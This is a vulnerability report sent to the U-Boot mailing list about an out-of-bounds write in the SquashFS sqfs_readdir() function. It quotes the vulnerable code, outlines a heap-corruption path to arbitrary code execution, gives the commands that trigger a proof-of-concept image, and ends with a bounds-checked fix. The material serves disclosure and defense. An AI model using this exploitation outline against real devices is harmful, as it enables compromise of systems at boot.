From: Jincheng Wang
Date: Thu, 26 May 2022 16:28:07 +0800
Subject: Out of bounds write vulnerability in the sqfs_readdir() function
To: u-boot@lists.denx.de

Hello u-boot list,

I found the sqfs_readdir() function is vulnerable to an out-of-bounds write, which will cause arbitrary code execution.

```
int sqfs_readdir(struct fs_dir_stream *fs_dirs, struct fs_dirent **dentp)
{
	/* ...... */

	/* Set entry name */
	strncpy(dent->name, dirs->entry->name, dirs->entry->name_size + 1);
	dent->name[dirs->entry->name_size + 1] = '\0';

	offset = dirs->entry->name_size + 1 + SQFS_ENTRY_BASE_LENGTH;
	dirs->entry_count--;

	/* ....... */
}

struct squashfs_dir_stream {
	struct fs_dir_stream fs_dirs;
	struct fs_dirent dentp;
	size_t size;
	int entry_count;
	struct squashfs_directory_header *dir_header;
	struct squashfs_directory_entry *entry;
	/* ...... */
};

static int sqfs_search_dir(struct squashfs_dir_stream *dirs, char **token_list,
			   int token_count, u32 *m_list, int m_count)
{
	/* ...... */

	while (!sqfs_readdir(dirsp, &dent)) {
		ret = strcmp(dent->name, token_list[j]);
		if (!ret)
			break;
		free(dirs->entry);
		dirs->entry = NULL;
	}

	/* ...... */
}
```

The sqfs_readdir() function uses strncpy to set the entry name, while the type of dirs->entry->name_size is defined as "u16" in struct squashfs_directory_entry and dent->name is defined as "char[256]" in struct fs_dirent. We can overwrite *dir_header and *entry in struct squashfs_dir_stream, so that we can use the sqfs_search_dir() function to free a fake chunk, which causes arbitrary code execution. You can see the PoC in the attachment.
```
host bind 0 test4.sqfs
ls host 0 /dirs
```

[Attachment: test4.sqfs (application/octet-stream), base64 body omitted]
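As an added example (not code from the report or from U-Boot), a bounded replacement for the name copy in sqfs_readdir(): the two struct layouts are reduced stand-ins, and sqfs_set_entry_name() and make_entry() are hypothetical helper names. It rejects any on-disk name_size that would not fit in the 256-byte dent->name, which is the check the quoted code lacks, and copies the name correctly otherwise.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>

#define FS_DIRENT_NAME_LEN 256  /* size of fs_dirent.name in U-Boot */

/* Reduced stand-ins for the two U-Boot structs quoted in the report. */
struct fs_dirent {
	char name[FS_DIRENT_NAME_LEN];
};

struct squashfs_directory_entry {
	uint16_t name_size;  /* on-disk value is strlen(name) - 1, untrusted */
	char name[];
};

/*
 * Bounded replacement for the strncpy in sqfs_readdir(): name_size comes
 * from the image and may be anything up to 65535, so it is checked against
 * the 256-byte destination before being used as a copy length or an index.
 * Returns 0 on success, -EINVAL (and an empty name) when it does not fit.
 */
int sqfs_set_entry_name(struct fs_dirent *dent,
			const struct squashfs_directory_entry *entry)
{
	size_t len = (size_t)entry->name_size + 1;  /* real name length */

	if (len >= sizeof(dent->name)) {  /* need len bytes plus the NUL */
		dent->name[0] = '\0';
		return -EINVAL;
	}
	memcpy(dent->name, entry->name, len);
	dent->name[len] = '\0';
	return 0;
}

/* Build a constructed entry for name in buf; NULL if it does not fit. */
struct squashfs_directory_entry *make_entry(void *buf, size_t buf_len,
					    const char *name)
{
	struct squashfs_directory_entry *e = buf;
	size_t len = strlen(name);

	if (len == 0 || len > UINT16_MAX || sizeof(*e) + len > buf_len)
		return NULL;
	memset(e, 0, sizeof(*e));
	e->name_size = (uint16_t)(len - 1);
	memcpy(e->name, name, len);
	return e;
}
```

Setting e->name_size to 0xffff after make_entry() models a forged on-disk length like the one in the attached image; the bounded copy refuses it instead of writing past dent->name.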